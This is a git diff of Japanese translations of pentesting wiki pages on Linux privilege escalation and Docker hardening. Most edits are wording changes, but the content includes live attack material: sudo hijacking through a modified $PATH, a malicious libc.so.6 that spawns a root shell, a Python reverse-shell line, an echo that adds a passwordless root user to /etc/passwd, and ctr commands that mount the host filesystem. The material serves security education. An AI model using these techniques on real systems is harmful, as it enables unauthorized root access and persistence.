+もし**ユーザーが通常マシンに接続し、`sudo`を使用して特権を昇格させる**ことを知っていて、そのユーザーコンテキスト内でシェルを取得した場合、**新しいsudo実行可能ファイルを作成**して、あなたのコードをrootとして実行し、その後ユーザーのコマンドを実行させることができます。次に、**ユーザーコンテキストの$PATHを変更**します(例えば、.bash_profileに新しいパスを追加するなど)ので、ユーザーがsudoを実行すると、あなたのsudo実行可能ファイルが実行されます。
 
-ユーザーが異なるシェル(bash以外)を使用している場合は、新しいパスを追加するために他のファイルを変更する必要があることに注意してください。例えば、[sudo-piggyback](https://github.com/APTy/sudo-piggyback)は`~/.bashrc`、`~/.zshrc`、`~/.bash_profile`を変更します。別の例は[bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)で見つけることができます。
+ユーザーが異なるシェル(bash以外)を使用している場合は、新しいパスを追加するために他のファイルを変更する必要があることに注意してください。例えば、[sudo-piggyback](https://github.com/APTy/sudo-piggyback)は`~/.bashrc`、`~/.zshrc`、`~/.bash_profile`を変更します。別の例は、[bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)で見つけることができます。
 
 または、次のようなコマンドを実行します:
 ```bash
@@ -1006,8 +1009,9 @@ sudo ls
 
 これは、`/etc/ld.so.conf.d/*.conf` からの設定ファイルが読み込まれることを意味します。この設定ファイルは **他のフォルダを指し示し**、そこに **ライブラリ** が **検索される** ことになります。例えば、`/etc/ld.so.conf.d/libc.conf` の内容は `/usr/local/lib` です。 **これは、システムが `/usr/local/lib` 内でライブラリを検索することを意味します**。
 
-何らかの理由で **ユーザーが書き込み権限を持っている** 場合、次のパスのいずれかに対して: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` 内の任意のファイル、または `/etc/ld.so.conf.d/*.conf` 内の設定ファイル内の任意のフォルダ、特権を昇格させることができるかもしれません。\
-次のページで **この誤設定を悪用する方法** を確認してください:
+何らかの理由で **ユーザーが書き込み権限を持っている** 場合、次のパスのいずれかに対して: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` 内の任意のファイル、または `/etc/ld.so.conf.d/*.conf` 内の設定ファイル内の任意のフォルダに対して、特権を昇格させることができるかもしれません。\
+この誤設定を **どのように悪用するか** を次のページで確認してください:
+
 
 {{#ref}}
 ld.so.conf-example.md
@@ -1033,7 +1037,7 @@ linux-gate.so.1 =>  (0x005b0000)
 libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x00737000)
 ```
-`/var/tmp`に`gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`を使って悪意のあるライブラリを作成します。
+`/var/tmp`に悪意のあるライブラリを作成します。コマンドは次の通りです:`gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
 ```c
 #include
 #define SHELL "/bin/sh"
@@ -1048,8 +1052,8 @@ execve(file,argv,0);
 ```
 ## Capabilities
 
-Linux capabilitiesは、**プロセスに利用可能なroot権限のサブセットを提供します**。これにより、rootの**権限がより小さく、区別された単位に分割されます**。これらの単位はそれぞれ独立してプロセスに付与できます。この方法により、権限の完全なセットが削減され、悪用のリスクが低下します。\
-以下のページを読んで、**capabilitiesについておよびそれを悪用する方法を学んでください**:
+Linux capabilitiesは、**プロセスに利用可能なroot権限のサブセットを提供します**。これにより、rootの**権限がより小さく、区別された単位に分割されます**。これらの単位は、プロセスに独立して付与することができます。この方法により、権限の完全なセットが削減され、悪用のリスクが低下します。\
+**capabilitiesとそれを悪用する方法について詳しく学ぶには、以下のページをお読みください**:
 
 {{#ref}}
 linux-capabilities.md
@@ -1057,12 +1061,12 @@ linux-capabilities.md
 
 ## Directory permissions
 
-ディレクトリ内で、**"execute"のビット**は、影響を受けるユーザーがフォルダに**"cd"**できることを示します。\
+ディレクトリ内で、**"execute"のビット**は、影響を受けるユーザーが**"cd"**でフォルダに入ることができることを示します。\
 **"read"**ビットは、ユーザーが**ファイルをリスト**できることを示し、**"write"**ビットは、ユーザーが**ファイルを削除**および**新しいファイルを作成**できることを示します。
 
 ## ACLs
 
-アクセス制御リスト(ACL)は、裁量的権限の二次的な層を表し、**従来のugo/rwx権限を上書きすることができます**。これらの権限は、所有者やグループの一部でない特定のユーザーに対して権利を付与または拒否することにより、ファイルまたはディレクトリへのアクセスをより制御します。このレベルの**粒度は、より正確なアクセス管理を保証します**。詳細は[**こちら**](https://linuxconfig.org/how-to-manage-acls-on-linux)で確認できます。
+アクセス制御リスト(ACL)は、裁量的権限の二次的な層を表し、**従来のugo/rwx権限を上書きすることができます**。これらの権限は、所有者やグループの一部でない特定のユーザーに対して権利を付与または拒否することにより、ファイルまたはディレクトリへのアクセスを強化します。このレベルの**粒度は、より正確なアクセス管理を保証します**。詳細は[**こちら**](https://linuxconfig.org/how-to-manage-acls-on-linux)で確認できます。
 
 **ユーザー"kali"にファイルに対する読み取りおよび書き込み権限を与えます**:
 ```bash
@@ -1097,7 +1101,7 @@ screen -x [user]/[session id]
 ```
 ## tmux セッションのハイジャック
 
-これは **古い tmux バージョン** に関する問題でした。非特権ユーザーとして root によって作成された tmux (v2.1) セッションをハイジャックすることはできませんでした。
+これは **古い tmux バージョン** に関する問題でした。特権のないユーザーとして root によって作成された tmux (v2.1) セッションをハイジャックすることはできませんでした。
 
 **tmux セッションのリスト**
 ```bash
@@ -1124,7 +1128,7 @@ Check **Valentine box from HTB** for an example.
 ### Debian OpenSSL Predictable PRNG - CVE-2008-0166
 
 Debianベースのシステム(Ubuntu、Kubuntuなど)で2006年9月から2008年5月13日までに生成されたすべてのSSLおよびSSHキーは、このバグの影響を受ける可能性があります。\
-このバグは、これらのOSで新しいsshキーを作成する際に発生します。**可能な変種は32,768通りのみ**です。これは、すべての可能性を計算できることを意味し、**ssh公開鍵を持っていれば、対応する秘密鍵を検索できます**。計算された可能性はここで見つけることができます: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
+このバグは、これらのOSで新しいsshキーを作成する際に発生します。**可能な変種は32,768通りのみでした**。これは、すべての可能性を計算できることを意味し、**ssh公開鍵を持っていれば、対応する秘密鍵を検索できます**。計算された可能性はここで見つけることができます: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 
 ### SSH Interesting configuration values
 
@@ -1134,7 +1138,7 @@ Debianベースのシステム(Ubuntu、Kubuntuなど)で2006年9月から20
 
 ### PermitRootLogin
 
-rootがsshを使用してログインできるかどうかを指定します。デフォルトは`no`です。可能な値:
+rootがsshを使用してログインできるかどうかを指定します。デフォルトは`no`です。可能な値:
 
 - `yes`: rootはパスワードと秘密鍵を使用してログインできます
 - `without-password`または`prohibit-password`: rootは秘密鍵のみでログインできます
@@ -1143,15 +1147,15 @@ rootがsshを使用してログインできるかどうかを指定します。
 
 ### AuthorizedKeysFile
 
-ユーザー認証に使用できる公開鍵を含むファイルを指定します。`%h`のようなトークンを含むことができ、これはホームディレクトリに置き換えられます。**絶対パス**(`/`で始まる)または**ユーザーのホームからの相対パス**を指定できます。例えば:
+ユーザー認証に使用できる公開鍵を含むファイルを指定します。`%h`のようなトークンを含むことができ、これはホームディレクトリに置き換えられます。**絶対パス**(`/`で始まる)または**ユーザーのホームからの相対パス**を指定できます。例えば:
 ```bash
 AuthorizedKeysFile    .ssh/authorized_keys access
 ```
-その設定は、ユーザー "**testusername**" の **private** キーでログインしようとすると、ssh があなたのキーの公開キーを `/home/testusername/.ssh/authorized_keys` と `/home/testusername/access` にあるものと比較することを示します。
+その設定は、ユーザー "**testusername**" の **private** キーでログインしようとすると、ssh があなたのキーの公開鍵を `/home/testusername/.ssh/authorized_keys` と `/home/testusername/access` にあるものと比較することを示します。
 
 ### ForwardAgent/AllowAgentForwarding
 
-SSH エージェントフォワーディングを使用すると、**サーバーに置いておくことなく**(パスフレーズなしの)**ローカルの SSH キーを使用**できます。これにより、ssh **を介してホストに** **ジャンプ**し、そこから **別の** ホストに **ジャンプ** **することができます** **初期ホスト** にある **キー** を使用して。
+SSH エージェントフォワーディングを使用すると、**サーバーに鍵を置かずに**(パスフレーズなしで!)**ローカルの SSH 鍵を使用する**ことができます。これにより、ssh **でホストにジャンプ**し、そこから **別の** ホストに **ジャンプする**ことができ、**初期ホスト**にある **キー**を使用します。
 
 このオプションを `$HOME/.ssh.config` に次のように設定する必要があります:
 ```
@@ -1208,7 +1212,7 @@ hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
 
 これで `hacker:hacker` で `su` コマンドを使用できます。
 
-また、パスワードなしでダミーユーザーを追加するには、次の行を使用できます。\
+また、パスワードなしのダミーユーザーを追加するには、次の行を使用できます。\
 警告: 現在のマシンのセキュリティが低下する可能性があります。
 ```
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
@@ -1231,7 +1235,7 @@ Group=root
 
 ### フォルダの確認
 
-以下のフォルダにはバックアップや興味深い情報が含まれている可能性があります: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root**(最後のものはおそらく読み取れませんが、試してみてください)
+以下のフォルダにはバックアップや興味深い情報が含まれている可能性があります: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root**(最後のものはおそらく読み取れないでしょうが、試してみてください)
 ```bash
 ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
 ```
@@ -1256,7 +1260,7 @@ done
 ```bash
 find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
 ```
-### Sqlite DB ファイル
+### Sqlite DBファイル
 ```bash
 find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
 ```
@@ -1287,12 +1291,12 @@ find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/gam
 ### Known files containing passwords
 
 [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)のコードを読んでください。これは**パスワードを含む可能性のあるいくつかのファイルを検索します**。\
-**もう一つの興味深いツール**は、[**LaZagne**](https://github.com/AlessandroZ/LaZagne)で、これはWindows、Linux、Macのローカルコンピュータに保存された多くのパスワードを取得するために使用されるオープンソースアプリケーションです。
+**もう一つの興味深いツール**は、[**LaZagne**](https://github.com/AlessandroZ/LaZagne)で、これはWindows、Linux、Macのローカルコンピュータに保存された多くのパスワードを取得するために使用されるオープンソースのアプリケーションです。
 
 ### Logs
 
 ログを読むことができれば、**その中に興味深い/機密情報を見つけることができるかもしれません**。ログが奇妙であればあるほど、興味深いものになるでしょう(おそらく)。\
-また、**「悪い」**構成(バックドア?)の**監査ログ**は、この記事で説明されているように、**監査ログ内にパスワードを記録することを許可するかもしれません**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/)。
+また、**「悪い」**設定(バックドア?)の**監査ログ**は、この記事で説明されているように、**監査ログ内にパスワードを記録することを許可するかもしれません**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/)。
 ```bash
 aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
@@ -1327,7 +1331,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
 ```
 ### Logrotateの悪用
 
-`logrotate`の脆弱性により、ログファイルまたはその親ディレクトリに**書き込み権限**を持つユーザーが特権を昇格させる可能性があります。これは、`logrotate`がしばしば**root**として実行され、特に_**/etc/bash_completion.d/**_のようなディレクトリで任意のファイルを実行するように操作できるためです。ログローテーションが適用されるディレクトリだけでなく、_var/log_内の権限も確認することが重要です。
+`logrotate`の脆弱性により、ログファイルまたはその親ディレクトリに**書き込み権限**を持つユーザーが特権を昇格させる可能性があります。これは、`logrotate`がしばしば**root**として実行され、特に_**/etc/bash_completion.d/**_のようなディレクトリで任意のファイルを実行するように操作できるためです。ログローテーションが適用される任意のディレクトリだけでなく、_ /var/log _内の権限も確認することが重要です。
 
 > [!TIP]
 > この脆弱性は`logrotate`バージョン`3.18.0`およびそれ以前のバージョンに影響します。
@@ -1356,28 +1360,31 @@ DEVICE=eth0
 ```
 ### **init, init.d, systemd, and rc.d**
 
-ディレクトリ `/etc/init.d` は **System V init (SysVinit)** のための **スクリプト** のホームです。これは **クラシックなLinuxサービス管理システム** であり、サービスを `start`、`stop`、`restart`、時には `reload` するためのスクリプトが含まれています。これらは直接実行することも、`/etc/rc?.d/` に見られるシンボリックリンクを通じて実行することもできます。Redhatシステムの代替パスは `/etc/rc.d/init.d` です。
+ディレクトリ `/etc/init.d` は **System V init (SysVinit)** のための **スクリプト** のホームです。これは **クラシックなLinuxサービス管理システム** であり、サービスを `start`、`stop`、`restart`、時には `reload` するためのスクリプトが含まれています。これらは直接実行することも、 `/etc/rc?.d/` にあるシンボリックリンクを通じて実行することもできます。Redhatシステムの代替パスは `/etc/rc.d/init.d` です。
 
-一方、`/etc/init` は **Upstart** に関連しており、これはUbuntuによって導入された新しい **サービス管理** で、サービス管理タスクのための設定ファイルを使用します。Upstartへの移行にもかかわらず、SysVinitスクリプトはUpstartの設定と共に互換性レイヤーのために引き続き利用されています。
+一方、 `/etc/init` は **Upstart** に関連しており、これはUbuntuによって導入された新しい **サービス管理** で、サービス管理タスクのための設定ファイルを使用します。Upstartへの移行にもかかわらず、SysVinitスクリプトはUpstartの設定と共に利用され続けており、Upstartには互換性レイヤーがあります。
 
-**systemd** は現代の初期化およびサービスマネージャーとして登場し、オンデマンドのデーモン起動、自動マウント管理、システム状態スナップショットなどの高度な機能を提供します。ファイルは配布パッケージ用の `/usr/lib/systemd/` と管理者の変更用の `/etc/systemd/system/` に整理されており、システム管理プロセスを効率化します。
+**systemd** は現代の初期化およびサービスマネージャーとして登場し、オンデマンドでのデーモン起動、自動マウント管理、システム状態のスナップショットなどの高度な機能を提供します。ファイルは配布パッケージ用に `/usr/lib/systemd/` に、管理者の変更用に `/etc/systemd/system/` に整理されており、システム管理プロセスを効率化します。
 
 ## Other Tricks
 
 ### NFS Privilege escalation
 
+
 {{#ref}}
 nfs-no_root_squash-misconfiguration-pe.md
 {{#endref}}
 
 ### Escaping from restricted Shells
 
+
 {{#ref}}
 escaping-from-limited-bash.md
 {{#endref}}
 
 ### Cisco - vmanage
 
+
 {{#ref}}
 cisco-vmanage.md
 {{#endref}}
@@ -1393,9 +1400,9 @@ cisco-vmanage.md
 
 ## Linux/Unix Privesc Tools
 
-### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+### **Linuxのローカル特権昇格ベクターを探すための最良のツール:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
 
-**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\
+**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-tオプション)\
 **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
 **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
 **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\
@@ -1403,8 +1410,8 @@ cisco-vmanage.md
 **Kernelpop:** LinuxとMACのカーネル脆弱性を列挙 [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
 **Mestaploit:** _**multi/recon/local_exploit_suggester**_\
 **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\
-**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\
-**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc)
+**EvilAbigail (物理アクセス):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\
+**その他のスクリプトの収集**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc)
 
 ## References
 
@@ -1426,9 +1433,11 @@ cisco-vmanage.md
 - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
 
+
 ## Android rooting frameworks: manager-channel abuse
 
-Androidルーティングフレームワークは、特権のあるカーネル機能をユーザースペースのマネージャに公開するために、一般的にシステムコールをフックします。弱いマネージャ認証(例:FD順に基づく署名チェックや不十分なパスワードスキーム)は、ローカルアプリがマネージャを偽装し、すでにルート化されたデバイスでルート権限を昇格させることを可能にします。詳細とエクスプロイトの詳細については、こちらをご覧ください:
+Androidルーティングフレームワークは、特権のあるカーネル機能をユーザースペースのマネージャに公開するために、一般的にシステムコールをフックします。弱いマネージャ認証(例:FD順序に基づく署名チェックや不十分なパスワードスキーム)は、ローカルアプリがマネージャを偽装し、すでにルート化されたデバイスでルートに昇格することを可能にします。詳細とエクスプロイトの詳細については、こちらをご覧ください:
+
 
 {{#ref}}
 android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
diff --git a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
index 902656447..e50fe739c 100644
--- a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md
@@ -4,7 +4,8 @@
 
 ## 基本情報
 
-**containerd** と `ctr` について学ぶには、以下のリンクにアクセスしてください:
+**containerd** と `ctr` について学ぶには、以下のリンクにアクセスしてください:
+
 
 {{#ref}}
 ../../network-services-pentesting/2375-pentesting-docker.md
@@ -12,7 +13,7 @@
 
 ## PE 1
 
-ホストに `ctr` コマンドが含まれていることがわかった場合:
+ホストに `ctr` コマンドが含まれていることがわかった場合:
 ```bash
 which ctr
 /usr/bin/ctr
@@ -35,7 +36,7 @@ ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:late
 ```bash
 ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
 ```
-次に、**特権機能を悪用してそれから脱出する**ために、以下のページに記載されているいくつかの技術を使用できます:
+次に、**特権機能を悪用してそこから脱出する**ために、以下のページに記載されているいくつかの技術を使用できます:
 
 {{#ref}}
 docker-security/
diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md
index 2e15d8b34..adc62fc50 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/README.md
@@ -10,14 +10,14 @@
 
 ### Dockerエンジンへの安全なアクセス
 
-Dockerエンジンには、Unixソケットを介してローカルでアクセスするか、HTTPを使用してリモートでアクセスできます。リモートアクセスの場合、機密性、整合性、および認証を確保するために、HTTPSと**TLS**を使用することが重要です。
+Dockerエンジンには、Unixソケットを介してローカルにアクセスするか、HTTPを使用してリモートでアクセスできます。リモートアクセスの場合、機密性、整合性、および認証を確保するために、HTTPSと**TLS**を使用することが重要です。
 
 Dockerエンジンは、デフォルトで`unix:///var/run/docker.sock`のUnixソケットでリッスンします。Ubuntuシステムでは、Dockerの起動オプションは`/etc/default/docker`に定義されています。Docker APIとクライアントへのリモートアクセスを有効にするには、次の設定を追加してDockerデーモンをHTTPソケット経由で公開します:
 ```bash
 DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H tcp://192.168.56.101:2376"
 sudo service docker restart
 ```
-しかし、セキュリティ上の懸念から、HTTP経由でDockerデーモンを公開することは推奨されません。HTTPSを使用して接続を保護することをお勧めします。接続を保護するための主なアプローチは2つあります:
+しかし、HTTP経由でDockerデーモンを公開することはセキュリティ上の懸念から推奨されません。HTTPSを使用して接続を保護することが望ましいです。接続を保護するための主なアプローチは2つあります:
 
 1. クライアントがサーバーのアイデンティティを確認します。
 2. クライアントとサーバーが互いのアイデンティティを相互認証します。
@@ -30,17 +30,17 @@ sudo service docker restart
 
 - [**Docker Hub**](https://hub.docker.com): Dockerのパブリックレジストリサービス。
 - [**Docker Registry**](https://github.com/docker/distribution): ユーザーが自分のレジストリをホストできるオープンソースプロジェクト。
-- [**Docker Trusted Registry**](https://www.docker.com/docker-trusted-registry): ロールベースのユーザー認証とLDAPディレクトリサービスとの統合を特徴とするDockerの商用レジストリ提供。
+- [**Docker Trusted Registry**](https://www.docker.com/docker-trusted-registry): ロールベースのユーザー認証とLDAPディレクトリサービスとの統合を特徴とするDockerの商用レジストリオファリング。
 
 ### イメージスキャン
 
-コンテナは、ベースイメージのため、またはベースイメージの上にインストールされたソフトウェアのために**セキュリティ脆弱性**を持つ可能性があります。Dockerは、コンテナのセキュリティスキャンを行い、脆弱性をリストする**Nautilus**というプロジェクトに取り組んでいます。Nautilusは、各コンテナイメージレイヤーを脆弱性リポジトリと比較することで、セキュリティホールを特定します。
+コンテナは、ベースイメージのため、またはベースイメージの上にインストールされたソフトウェアのために**セキュリティ脆弱性**を持つ可能性があります。Dockerは、コンテナのセキュリティスキャンを行い、脆弱性をリストアップする**Nautilus**というプロジェクトに取り組んでいます。Nautilusは、各コンテナイメージレイヤーを脆弱性リポジトリと比較することによってセキュリティホールを特定します。
 
 詳細については、[**こちらをお読みください**](https://docs.docker.com/engine/scan/)。
 
 - **`docker scan`**
 
-**`docker scan`**コマンドを使用すると、イメージ名またはIDを使用して既存のDockerイメージをスキャンできます。たとえば、hello-worldイメージをスキャンするには、次のコマンドを実行します:
+**`docker scan`**コマンドを使用すると、イメージ名またはIDを使用して既存のDockerイメージをスキャンできます。たとえば、次のコマンドを実行してhello-worldイメージをスキャンします:
 ```bash
 docker scan hello-world
 
@@ -68,11 +68,11 @@ snyk container test  --json-file-output= --severity-threshol
 ```bash
 clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5
 ```
-### Dockerイメージ署名
+### Docker Image Signing
 
-Dockerイメージ署名は、コンテナで使用されるイメージのセキュリティと整合性を確保します。以下は簡潔な説明です:
+Dockerイメージの署名は、コンテナで使用されるイメージのセキュリティと整合性を確保します。以下は簡潔な説明です:
 
-- **Docker Content Trust** は、Notaryプロジェクトを利用し、The Update Framework (TUF) に基づいてイメージ署名を管理します。詳細については [Notary](https://github.com/docker/notary) と [TUF](https://theupdateframework.github.io) を参照してください。
+- **Docker Content Trust** は、Notaryプロジェクトを利用し、The Update Framework (TUF) に基づいてイメージの署名を管理します。詳細については [Notary](https://github.com/docker/notary) と [TUF](https://theupdateframework.github.io) を参照してください。
 - Dockerコンテンツトラストを有効にするには、`export DOCKER_CONTENT_TRUST=1` を設定します。この機能は、Dockerバージョン1.10以降ではデフォルトでオフになっています。
 - この機能が有効な場合、署名されたイメージのみがダウンロードできます。最初のイメージプッシュには、ルートおよびタグ付けキーのパスフレーズを設定する必要があり、Dockerはセキュリティを強化するためにYubikeyもサポートしています。詳細は [こちら](https://blog.docker.com/2015/11/docker-content-trust-yubikey/) で確認できます。
 - コンテンツトラストが有効な状態で署名されていないイメージをプルしようとすると、「No trust data for latest」というエラーが発生します。
@@ -92,46 +92,46 @@ Dockerホストを切り替える際は、操作を維持するためにルー
 
 **主なプロセス隔離機能**
 
-コンテナ化された環境では、プロジェクトとそのプロセスを隔離することがセキュリティとリソース管理のために重要です。以下は、主要な概念の簡略化された説明です:
+コンテナ化された環境では、プロジェクトとそのプロセスを隔離することがセキュリティとリソース管理のために極めて重要です。以下は主要な概念の簡略化された説明です:
 
 **ネームスペース**
 
 - **目的**: プロセス、ネットワーク、ファイルシステムなどのリソースの隔離を確保します。特にDockerでは、ネームスペースがコンテナのプロセスをホストや他のコンテナから分離します。
 - **`unshare`の使用**: `unshare`コマンド(または基盤となるシステムコール)は、新しいネームスペースを作成するために利用され、追加の隔離層を提供します。ただし、Kubernetesはこれを本質的にブロックしませんが、Dockerはブロックします。
-- **制限**: 新しいネームスペースを作成しても、プロセスがホストのデフォルトネームスペースに戻ることはできません。ホストネームスペースに侵入するには、通常、ホストの`/proc`ディレクトリへのアクセスが必要で、`nsenter`を使用して入ります。
+- **制限**: 新しいネームスペースを作成することは、プロセスがホストのデフォルトネームスペースに戻ることを許可しません。ホストネームスペースに侵入するには、通常、ホストの`/proc`ディレクトリへのアクセスが必要で、`nsenter`を使用して入ります。
 
-**コントロールグループ(CGroups)**
+**コントロールグループ (CGroups)**
 
 - **機能**: 主にプロセス間でリソースを割り当てるために使用されます。
 - **セキュリティの側面**: CGroups自体は隔離セキュリティを提供しませんが、`release_agent`機能が誤って設定されると、無許可のアクセスに悪用される可能性があります。
 
-**能力の削除**
+**能力のドロップ**
 
 - **重要性**: プロセス隔離のための重要なセキュリティ機能です。
-- **機能**: 特定の能力を削除することで、ルートプロセスが実行できるアクションを制限します。プロセスがルート権限で実行されていても、必要な能力が欠けていると、特権アクションを実行できず、システムコールは権限不足のため失敗します。
+- **機能**: 特定の能力をドロップすることで、ルートプロセスが実行できるアクションを制限します。プロセスがルート権限で実行されていても、必要な能力が欠けていると、特権アクションを実行できず、システムコールは権限不足のため失敗します。
 
-これがプロセスが他の能力を削除した後の**残りの能力**です:
+これがプロセスが他の能力をドロップした後の**残りの能力**です:
 ```
 Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
 ```
 **Seccomp**
 
-Dockerではデフォルトで有効になっています。これは、プロセスが呼び出すことができる**syscallsをさらに制限する**のに役立ちます。\
+デフォルトでDockerに有効になっています。これは、プロセスが呼び出すことができる**syscallsをさらに制限する**のに役立ちます。\
 **デフォルトのDocker Seccompプロファイル**は[https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json)で見つけることができます。
 
 **AppArmor**
 
-Dockerには有効化できるテンプレートがあります:[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
+Dockerには、アクティブ化できるテンプレートがあります:[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
 
-これにより、能力、syscalls、ファイルやフォルダへのアクセスを減らすことができます...
+これにより、機能、syscalls、ファイルおよびフォルダへのアクセスを制限することができます...
### Namespaces -**Namespaces**はLinuxカーネルの機能で、**カーネルリソースを分割**し、あるセットの**プロセス**があるセットの**リソース**を**見る**一方で、**別の**セットの**プロセス**が**異なる**セットのリソースを見ることができます。この機能は、リソースとプロセスのセットに同じnamespaceを持たせることによって機能しますが、それらのnamespaceは異なるリソースを指します。リソースは複数の空間に存在することがあります。 +**Namespaces**は、Linuxカーネルの機能で、**カーネルリソースを分割**し、あるセットの**プロセス**があるセットの**リソース**を**見る**一方で、**別の**セットの**プロセス**が**異なる**セットのリソースを見ることができるようにします。この機能は、リソースとプロセスのセットに同じnamespaceを持たせることによって機能しますが、それらのnamespaceは異なるリソースを指します。リソースは複数の空間に存在することがあります。 -Dockerは、コンテナの隔離を実現するために以下のLinuxカーネルNamespacesを利用しています: +Dockerは、コンテナの分離を実現するために以下のLinuxカーネルNamespacesを利用しています: - pid namespace - mount namespace @@ -139,7 +139,7 @@ Dockerは、コンテナの隔離を実現するために以下のLinuxカーネ - ipc namespace - UTS namespace -**Namespacesに関する詳細情報**は以下のページを確認してください: +**namespacesに関する詳細情報**は、以下のページを確認してください: {{#ref}} namespaces/ @@ -147,8 +147,8 @@ namespaces/ ### cgroups -Linuxカーネルの機能**cgroups**は、**cpu、memory、io、network bandwidthなどのリソースを制限する**能力を提供します。Dockerは、特定のコンテナのリソース制御を可能にするcgroup機能を使用してコンテナを作成できます。\ -以下は、ユーザースペースのメモリが500mに制限され、カーネルメモリが50mに制限され、cpuシェアが512、blkioweightが400に設定されたコンテナです。CPUシェアはコンテナのCPU使用量を制御する比率です。デフォルト値は1024で、範囲は0から1024です。3つのコンテナが同じCPUシェア1024を持つ場合、各コンテナはCPUリソースの競合が発生した場合に最大33%のCPUを使用できます。blkio-weightはコンテナのIOを制御する比率です。デフォルト値は500で、範囲は10から1000です。 +Linuxカーネルの機能**cgroups**は、**cpu、memory、io、network bandwidthなどのリソースを制限する**能力を提供します。Dockerは、特定のコンテナのリソース制御を可能にするcgroup機能を使用してコンテナを作成することを許可します。\ +以下は、ユーザースペースのメモリが500mに制限され、カーネルメモリが50mに制限され、cpuシェアが512、blkioweightが400に設定されたコンテナです。CPUシェアは、コンテナのCPU使用量を制御する比率です。デフォルト値は1024で、範囲は0から1024です。3つのコンテナが同じCPUシェア1024を持つ場合、各コンテナはCPUリソースの競合が発生した場合に最大33%のCPUを使用できます。blkio-weightは、コンテナのIOを制御する比率です。デフォルト値は500で、範囲は10から1000です。 ``` docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash ``` @@ -158,13 +158,15 @@ docker 